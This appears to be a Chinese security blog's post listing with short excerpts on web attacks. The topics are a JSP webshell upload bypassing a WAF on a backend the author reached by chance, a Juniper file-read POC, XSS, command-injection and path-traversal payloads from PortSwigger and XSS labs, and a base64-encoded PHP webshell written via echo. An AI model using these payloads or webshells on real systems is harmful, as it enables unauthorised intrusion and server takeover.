author avatar

iy

Jsp 站绕长亭 WAF 小记

前言 偶然进了个后台,存在任意文件上传漏洞,但是常规的 webshell 均被杀,但是确实是可以解析的。 获取绝对路径 上传该脚本,获取网站绝对路径 <%@ page language="java" contentType="text/html; charset=UTF-8" pageEnc

Juniper 任意文件读取漏洞

界面 POC POST /?PHPRC=/dev/fd/0 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 Accept:

一篇关于 XSS 的文章

XSS 思路 XSS Labs 1-16 关指南 1. 不需要任何绕过 http://192.168.30.124/xss-labs-master/level1.php?name=<script>alert(1)</script> <

Burp + 夜神模拟器抓 APP 数据包

在安卓 7.0 及以上的系统下,应用只会信任系统预装的 CA 证书,而不会信任用户安装的 CA 证书,所谓的中间人攻击就不起效果了。 所以我们只要将 Burp 的证书伪装成系统证书就可以抓包了。 操作步骤 1.先在 Burp 上将证书导出为 .der,然后放到 linux 下,执行如下操作 open

PortSwigger - SSRF

针对本地服务器的 SSRF 有些网站后台只允许通过回环地址访问,外网是没办法访问的,如果存在 SSRF 漏洞,且可将解析的地址内容回显到页面上,那么就可以绕过该限制。 来到漏洞环境,直接访问 /admin,提示需要通过回环地址访问 点击检查库存 拦截数据包,发现参数 s

PortSwigger - 业务逻辑漏洞

支付漏洞 - 负数 商品数量可以设置为负数,但是总价不能为负数。此时添加另一个商品的适当负数量,以将总价降低到低于您的剩余商店积分。 支付漏洞 - 整数溢出 整数溢出通常是由于对整数数据类型的范围进行不当操作或者超过了其表示范围引起的。下面是一些常见的导致整数溢出的原因: 超过数据类型的表示范围:

PortSwigger - 命令注入

盲命令注入 如果命令执行没有回显,或者 dnslog 无法接收该服务器的请求时,盲命令注入能够有效探测是否存在漏洞。 比如执行 ping 命令 x||ping+-c+10+b127.0.0.1||

PortSwigger - 路径遍历

在 Windows 上, 和../都是..\有效的目录遍历序列。 绝对路径绕过 这个就不说了,简单得很。 嵌套遍历绕过 后端非递归地将 ../ 删除后,可以绕过 比如: /image?filename=..././..././..././..././..././etc/passwd /image?f

PortSwigger - 身份验证漏洞

用户名枚举-通过响应时间 用户名枚举有多种方式,比如: 返回长度的差异 错误消息差异 响应时间差异(此例如下) 已知用户名 wiener 是存在的,先输入一个错误的密码,看看响应时间 357 ms 然后输入一个较长的密码,发现响应时间变长

echo 写马方式

Windows 下 先把 webshell 进行 base64 编码 PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2s